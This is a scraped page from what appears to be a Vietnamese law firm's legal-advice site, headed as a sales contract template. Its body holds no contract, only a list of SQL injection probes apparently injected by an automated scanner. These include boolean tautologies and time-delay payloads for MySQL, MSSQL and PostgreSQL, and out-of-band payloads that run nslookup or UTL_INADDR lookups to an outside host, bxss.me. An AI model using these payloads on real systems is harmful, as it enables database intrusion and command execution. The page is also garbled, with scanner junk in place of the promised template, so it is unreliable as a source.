Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu hợp đồng mua bán hàng hóa

Cập nhật lần cuối lúc 11:11 ngày 09/07/2014

1
1
1
1
-1 OR 2+706-706-1=0+0+0+1 --
-1 OR 3+706-706-1=0+0+0+1 --
-1 OR 3*2<(0+5+706-706) --
-1 OR 3*2>(0+5+706-706) --
-1 OR 2+81-81-1=0+0+0+1
-1 OR 3+81-81-1=0+0+0+1
-1 OR 3*2<(0+5+81-81)
-1 OR 3*2>(0+5+81-81)
-1' OR 2+153-153-1=0+0+0+1 --
-1' OR 3+153-153-1=0+0+0+1 --
-1' OR 3*2<(0+5+153-153) --
1'"
-1' OR 3*2>(0+5+153-153) --
\
-1' OR 2+892-892-1=0+0+0+1 or 'SuNfxfxi'='
1
@@2I2MD
-1' OR 3+892-892-1=0+0+0+1 or 'SuNfxfxi'='
-1' OR 3*2<(0+5+892-892) or 'SuNfxfxi'='
JyI=
-1' OR 3*2>(0+5+892-892) or 'SuNfxfxi'='
-1" OR 2+293-293-1=0+0+0+1 --
-1" OR 3+293-293-1=0+0+0+1 --
-1" OR 3*2<(0+5+293-293) --
-1" OR 3*2>(0+5+293-293) --
if(now()=sysdate(),sleep(5.172),0)/*'XOR(if(now()=sysdate(),sleep(5.172),0))OR'"XOR(if(now()=sysdate(),sleep(5.172),0))OR"*/
(select(0)from(select(sleep(10.344)))v)/*'+(select(0)from(select(sleep(10.344)))v)+'"+(select(0)from(select(sleep(10.344)))v)+"*/
-1; waitfor delay '0:0:15.515999999999998' --
-1); waitfor delay '0:0:15.515999999999998' --
1 waitfor delay '0:0:5.172' --
kcL1QrFn'; waitfor delay '0:0:10.344' --
-1;select pg_sleep(10.344); --
-1);select pg_sleep(10.344); --
-1));select pg_sleep(15.515999999999998); --
mldav5QL';select pg_sleep(5.172); --
HiV33Pew');select pg_sleep(5.172); --
WOetePaC'));select pg_sleep(5.172); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5005.34060.3ec2d.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5006.34060.3ec2d.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5007.34060.3ec2d.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5008.34060.3ec2d.\1.bxss.me
204'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: